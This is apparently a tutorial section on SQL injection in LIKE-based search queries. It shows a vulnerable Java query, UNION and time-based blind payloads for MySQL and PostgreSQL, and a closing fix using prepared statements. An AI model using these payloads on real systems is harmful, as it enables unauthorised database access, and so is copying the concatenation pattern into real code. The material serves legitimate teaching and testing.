Vulnerable CodeLIKE clauses are heavily used in search features. Developers often concatenate user input directly between wildcard (%) characters. To break out, you must close the initial string quote, and then either comment out or logically neutralize the trailing % and quote.
// Vulnerable Context: Input wrapped in wildcards and stringsString searchTerm = request.getParameter("search"); String query = "SELECT title, body FROM articles WHERE title LIKE '%" + searchTerm + "%'";
Where To Look For The Vulnerability
Look for any feature that searches for partial text matches.
Search Bars: Finding a user, product, or article.
URL Parameters:?q=, ?search=, ?filter=, ?keyword=
Autocomplete/Typeahead: API endpoints that fetch results as you type.
-- Universal Bypass (Works on Contains, Starts With, and Ends With) test' UNION {SELECT_query}-- -- Logical Closures (Use if comments are filtered) -- For "Contains" (LIKE '%{input}%'): test' UNION {SELECT_query} AND '%'=' -- For "Starts With" (LIKE '{input}%'): test' UNION {SELECT_query} AND '%'=' -- For "Ends With" (LIKE '%{input}'): test' UNION {SELECT_query} AND ''='
-- Syntax: [Valid Search]' AND [Sleep Function]---- MySQL: If user is admin, sleep 5 secondstest' AND IF((SELECT user)='admin', SLEEP(5), 0)---- PostgreSQL:test' AND (SELECT CASE WHEN ((SELECT current_user)='admin') THEN pg_sleep(5) ELSE pg_sleep(0) END)--
Mitigation
Fix: Use Prepared Statements. Additionally, if the application needs to treat user input as literal characters rather than wildcards, the user’s % and _ characters must be manually escaped (e.g., \%, \_) before being passed to the query.